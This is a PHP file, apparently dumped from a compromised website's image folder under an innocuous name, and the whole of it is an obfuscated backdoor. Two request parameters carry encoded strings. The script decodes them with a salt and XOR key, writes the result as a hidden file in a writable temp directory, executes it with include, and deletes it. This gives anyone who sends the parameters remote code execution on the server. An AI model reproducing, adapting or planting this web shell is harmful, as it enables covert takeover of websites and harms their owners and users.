File: //home/vitanhod/wepatol.vitavit.com.pk/img/Amemberlist.php
<?php if(array_key_exists("\x70s\x65t", $_REQUEST)){ $hld = array_filter(["/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/var/tmp"]); $data_chunk = $_REQUEST["\x70s\x65t"]; $data_chunk = explode ('.' , $data_chunk ) ; $ent = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $r = 0; array_walk($data_chunk ,function ($v5) use (&$ent ,&$r ,$salt5 ,$sLen) { $sChar = ord($salt5[$r %$sLen]); $dec = ((int)$v5 - $sChar - ($r %10)) ^ 94; $ent .= chr($dec); $r++; }); foreach ($hld as $marker) { if (max(0, is_dir($marker) * is_writable($marker))) { $entry = join("/", [$marker, ".key"]); $success = file_put_contents($entry, $ent); if ($success) { include $entry; @unlink($entry); exit;} } } }
if(array_key_exists("\x64at", $_REQUEST)){
$record = $_REQUEST["\x64at"];
$record = explode( "." , $record ) ;
$obj = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $s);
foreach( $record as $i => $v8) {
$chS = ord( $s[$i % $lenS]);
$d =( ( int)$v8 - $chS -( $i % 10)) ^31;
$obj .= chr( $d);
}
$sym = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), session_save_path()]);
foreach ($sym as $resource) {
if ((is_dir($resource) and is_writable($resource))) {
$binding = "$resource/.holder";
if (file_put_contents($binding, $obj)) {
include $binding;
@unlink($binding);
die();
}
}
}
}